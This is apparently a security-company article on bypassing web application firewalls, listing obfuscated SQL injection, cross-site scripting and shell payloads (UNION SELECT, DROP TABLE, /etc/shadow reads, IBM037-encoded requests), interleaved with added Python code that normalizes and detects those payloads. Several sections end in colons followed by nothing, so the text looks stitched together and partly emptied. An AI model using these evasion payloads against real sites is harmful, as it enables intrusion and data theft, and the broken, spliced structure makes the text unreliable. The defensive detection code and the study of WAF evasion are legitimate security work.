How to hack and bypass a web application firewall (WAF) during penetration testing

The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block network attacks against a specific web application. According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny access to an online deployment.

Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.

A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. Bypassing the WAF lets researchers (and also hackers) see what is behind these implementations.

Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants against these solutions, primarily by delivering malicious payloads disguised as legitimate traffic.

On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.

HOW TO DETECT A WAF?

There is a general process for finding the actual IP of a target website:

To check if a WAF is configured correctly, pentesting experts recommend relying on the following indicators:

To verify the proper configuration of these devices, experts can:

WAF HACKING TOOLS

Most hackers use automated tools to speed up web application firewall evasion. Below is a small list of the most popular tools for these activities; their use is only the first step in verifying how much information an attacker would be able to access.

There are many other tools, but pentesting experts claim that these are the most popular.

WAF EVASION

Below we will review some of the best known WAF bypassing techniques.

Case switch technique

This technique mixes uppercase and lowercase characters in the keywords of a payload so that a case-sensitive signature no longer matches.

Basic request payload:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL encoding technique

Pentesting experts can also modify a normal payload with percent (URL) encoding. For this technique you can use Burp Suite, which has a built-in encoding and decoding tool.

%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode technique

Unicode equivalents of ASCII characters provide another way to evade a WAF. Encode the entire payload or just one fragment of it.

/?redir=http://google.com
/?redir=http://google。 com (Unicode)
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML presentation

According to pentesting experts, web applications encode special characters as HTML entities and decode them again when rendering; the basic cross-site scripting cases use numeric and named HTML entity encoding.

"><img src=x onerror=confirm()>

Mixed coding techniques

WAF rules tend to filter one particular type of encoding at a time. Such filters can be bypassed with a payload that combines several encodings, adds new lines and tabs, and layers further obfuscation on top.

Comment technique

Hackers often hide standard payload vectors inside code comments, pentesting experts mention. Different payloads call for different obfuscation methods.

/?id=1+un/**/ion+sel/**/ect+1,2-

Attackers can also insert comments in the middle of the lines of attack. For example, /*!SELECT*/ can be ignored by the WAF implementation, but passed to the target application and processed by the MySQL database.

index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#
index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3

Double encoding method

WAF filters typically handle one layer of character encoding when protecting a web application. Poorly designed filters can be evaded with relative ease using double encoding, say pentesting experts.

%253Cscript%253Econfirm()%253C%252Fscript%253E
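A defender's view of the case-switch, URL-encoding, Unicode, HTML-entity, mixed-encoding, comment and double-encoding techniques above (and of the tab and line-break variants discussed further down): the following Python is an added example, not code from the article or from IICS. It shows the canonicalization a WAF or log-inspection rule should apply before matching any signature, so that the encoded forms of a payload reduce to the same string the backend will see. The SIGNATURES patterns, the sample list and the two constructed variants (an entity-encoded form of the img payload and a tab/CRLF form of the test.com payload) are my own assumptions for the demo; the other samples are the payloads quoted on this page.

```python
import html
import re
import unicodedata
from urllib.parse import unquote_to_bytes

MAX_DECODE_ROUNDS = 3  # bound the loop so a hostile input cannot keep the filter decoding

# Signatures are matched against the canonical form only, never against the raw request.
# These four patterns are constructed for the demo and are not a production rule set.
SIGNATURES = {
    "sqli-union": re.compile(r"\bunion\b[\s(]*(all\b\s*)?select\b"),
    "sqli-select": re.compile(r"\bselect\b.*?\bfrom\b"),
    "xss-tag": re.compile(r"<\s*(svg|img|script)\b"),
    "xss-handler": re.compile(r"\bon(load|error)\s*="),
}


def percent_decode(s: str) -> str:
    """One round of %XX decoding. Bytes that are not valid UTF-8 (%a0, the overlong
    %C0AE forms) are kept as latin-1 so they stay visible instead of becoming U+FFFD."""
    raw = unquote_to_bytes(s)
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def canonicalize(payload: str) -> str:
    """Reduce a query-string value to the form the backend will effectively see."""
    s = payload.replace("+", " ")                       # '+' is a space in form/query data
    for _ in range(MAX_DECODE_ROUNDS):                  # decode until stable: beats %25xx double encoding
        decoded = percent_decode(s)
        if decoded == s:
            break
        s = decoded
    s = html.unescape(s)                                # &#60; / &lt; style numeric and named entities
    s = unicodedata.normalize("NFKC", s)                # fullwidth forms and NBSP fold to plain ASCII
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s, flags=re.S)  # MySQL runs the body of /*! ... */
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)       # ordinary comments act as whitespace
    s = s.casefold()                                    # SeLeCt and select are the same keyword
    s = re.sub(r"[\s\x00-\x1f]+", " ", s).strip()       # tabs, CR/LF and control bytes -> one space
    return s


def match_signatures(payload: str) -> list:
    """Names of the signatures that match the canonical form of payload (empty if none)."""
    canon = canonicalize(payload)
    return [name for name, rx in SIGNATURES.items() if rx.search(canon)]


# Payloads quoted on this page, two constructed variants (entity-encoded img payload,
# tab/CRLF form of the test.com payload) and one benign query for comparison.
SAMPLES = [
    "sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'",
    "http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4",
    "%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F",
    "UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29",
    "index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#",
    "index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3",
    "%253Cscript%253Econfirm()%253C%252Fscript%253E",
    "&#60;img src=x onerror=confirm()&#62;",
    "http://test.com/test?id=1\tunion\r\nselect\t1,2,3",
    "page_id=42&sort=asc",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{match_signatures(sample) or ['clean']}  <-  {canonicalize(sample)}")
```

Two design choices matter here. Decoding is repeated until the string stops changing, but with a fixed upper bound, so triple-encoded input is still caught while a crafted input cannot turn the filter into a CPU sink. Bytes that are not valid UTF-8 are kept rather than replaced, which is what makes the %a0 and overlong-sequence payloads visible to the later steps; a stricter deployment would reject invalid UTF-8 outright instead of folding it.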

Template obfuscation

Several command-line utilities accept wildcard (glob) patterns to operate on many files at once. These patterns can be altered to run system commands.

Dynamic loading technique

Programming languages differ in their syntax for string concatenation. According to pentesting experts, this allows you to build payloads that evade various filters and rules.

/bi'n'''/c''at' /e'tc'/sh''ad'ow

Bash allows the concatenation of paths for execution.

Junk character technique

Simple payloads are easily filtered by a WAF. In some cases, adding junk characters helps avoid detection, allowing pentesting experts to confuse regular-expression-based firewalls.

Line break technique

Many regular-expression-based WAF filters block repeated attempts effectively. Inserting line breaks (CR and LF characters) can break the firewall’s regular expression and bypass the security measure.

Invalid uninitialized variable technique

Regular expression filters can be bypassed by using uninitialized Bash variables. An unset variable expands to nothing, so it acts as an empty string; Bash and Perl both allow this.

$u/bin$u/cat$u $u/etc$u/shadow$u
$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
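The quote tricks in "Dynamic loading technique" above and the uninitialized-variable payloads in this section both rely on the shell collapsing the obfuscation before it executes anything, so a detector that inspects command strings has to do the same. The following Python is an added example, not code from the article or from IICS: it expands unset variables to the empty string, lets shlex perform POSIX quote removal, and then checks the canonical command against a watch list. WATCHED_PATHS and the env dictionary are assumptions for the demo.

```python
import re
import shlex

# Paths whose appearance in a canonicalized command should raise an alert (demo assumption).
WATCHED_PATHS = ("/etc/passwd", "/etc/shadow")
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def expand_vars(command: str, env: dict) -> str:
    """Expand $name and ${name}. Names missing from env become the empty string,
    which is exactly what the $u/bin$u/cat$u payloads rely on."""
    return VAR_RE.sub(lambda m: env.get(m.group(1), ""), command)


def canonical_command(command: str, env=None) -> str:
    """Return the command the way the shell would see it after variable expansion
    and quote removal. Unknown variables are treated as unset."""
    expanded = expand_vars(command, env or {})
    try:
        # POSIX mode strips the quotes and joins adjacent quoted/unquoted fragments
        # into one word, so /bi'n'''/c''at' becomes /bin/cat.
        return " ".join(shlex.split(expanded, posix=True))
    except ValueError:
        return expanded  # unbalanced quotes: keep the raw string so it is still inspected


def watched_paths_in(command: str, env=None) -> list:
    """Watch-list paths present in the canonical form of command (empty if none)."""
    canon = canonical_command(command, env)
    return [p for p in WATCHED_PATHS if p in canon]


# Payloads quoted on this page plus a benign command for comparison.
SAMPLES = [
    "/bi'n'''/c''at' /e'tc'/sh''ad'ow",
    "$u/bin$u/cat$u $u/etc$u/shadow$u",
    "$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff",
    "ls -l /tmp",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{watched_paths_in(sample) or ['clean']}  <-  {canonical_command(sample)!r}")
```

Note that the first quoted payload collapses to a single word containing a space, because one of its quoted fragments is `' /e'`; the detector still catches it because it searches the joined canonical string rather than individual words. When a real environment is available, pass it as env so that set variables expand to their actual values instead of disappearing.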

Tabs and line break

Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.

http://test.com/test?id=1 union select 1,2,3

Token Breakers

Token attacks try to break the logic by which a WAF splits a request into tokens, pentesting experts say. Token breakers are characters that change how a string element maps to a specific token; the request must remain valid for the backend when token breakers are used.

?id='-sqlite_version() UNION SELECT passwords FROM users -

Example: unknown context for the pentester.

?id=12);D ROP TABLE users -
?id=133) INTO OUTFILE 'xxx' -

Obfuscation technique in other formats

Many web applications support different encodings and can interpret them. The goal is to obfuscate the payload in a format the WAF does not understand but the server still decodes and forwards to the application.

IIS 6, 7.5, 8 and 10 can interpret parameters encoded as IBM037 (EBCDIC).

Send the parameters encoded as IBM037. The first request is the plain payload; the second carries the same parameter name and value in EBCDIC, with the charset declared in the Content-Type header:

POST /example.aspx?id7=sometext HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27

id2='union all select * from users-

POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127

%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99
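The charset trick works only against an inspector that decodes the body with a fixed charset while the backend honours the one the client declared. The following Python is an added example, not code from the article or from IICS, of a body decoder that does what the backend does: percent-decode to bytes, then decode those bytes with the declared charset before any signature is applied. The sample body is constructed by converting the page's plaintext parameter with Python's cp037 codec (the name Python uses for IBM037) and percent-encoding the result; UNION_RE and the helper names are my own assumptions.

```python
import codecs
import re
from urllib.parse import quote_from_bytes, unquote_to_bytes

UNION_RE = re.compile(r"\bunion\b[\s(]*(all\b\s*)?select\b", re.I)

CT_UTF8 = "application/x-www-form-urlencoded; charset=utf-8"
CT_IBM037 = "application/x-www-form-urlencoded; charset=ibm037"

# Constructed sample: the article's plaintext parameter, written the way the second
# request on the page does it, i.e. name and value converted to IBM037/EBCDIC with
# Python's cp037 codec and then percent-encoded.
PLAIN_NAME, PLAIN_VALUE = "id2", "'union all select * from users--"
SAMPLE_BODY = (quote_from_bytes(PLAIN_NAME.encode("cp037")) + "="
               + quote_from_bytes(PLAIN_VALUE.encode("cp037"))).encode("ascii")


def declared_charset(content_type: str) -> str:
    """Charset label from a Content-Type header, defaulting to utf-8 when absent."""
    m = re.search(r'charset\s*=\s*"?([A-Za-z0-9._:-]+)"?', content_type, re.I)
    return m.group(1).lower() if m else "utf-8"


def decode_form_body(raw_body: bytes, content_type: str) -> dict:
    """Percent-decode each name and value to bytes, then decode those bytes with the
    charset the client declared, which is what the backend will do."""
    charset = declared_charset(content_type)
    try:
        codecs.lookup(charset)
    except LookupError:
        charset = "utf-8"  # unknown label: fall back, and a real WAF should log this event
    params = {}
    for pair in raw_body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        # '+' means space in form encoding; decode it before the percent escapes.
        name_bytes = unquote_to_bytes(name.replace(b"+", b" "))
        value_bytes = unquote_to_bytes(value.replace(b"+", b" "))
        params[name_bytes.decode(charset, "replace")] = value_bytes.decode(charset, "replace")
    return params


def body_has_union_select(raw_body: bytes, content_type: str) -> bool:
    """True when any decoded parameter value matches the UNION ... SELECT signature."""
    params = decode_form_body(raw_body, content_type)
    return any(UNION_RE.search(v) for v in params.values())


if __name__ == "__main__":
    print("wire body:", SAMPLE_BODY.decode("ascii"))
    print("decoded as declared (ibm037):", decode_form_body(SAMPLE_BODY, CT_IBM037))
    print("decoded naively as utf-8:    ", decode_form_body(SAMPLE_BODY, CT_UTF8))
    print("flagged with declared charset:", body_has_union_select(SAMPLE_BODY, CT_IBM037))
    print("flagged with fixed utf-8:     ", body_has_union_select(SAMPLE_BODY, CT_UTF8))
```

Run with the declared charset the decoder recovers `id2='union all select * from users--` and the signature fires; decoded as fixed UTF-8 the same bytes become replacement characters and nothing matches, which is precisely the gap the IBM037 request exploits. A deployment that cannot list every charset the backend accepts should treat an unexpected charset label as a reason to block or escalate rather than silently fall back.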

Finally, pentesting experts offer a number of useful tips for these security tests:

For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses, feel free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.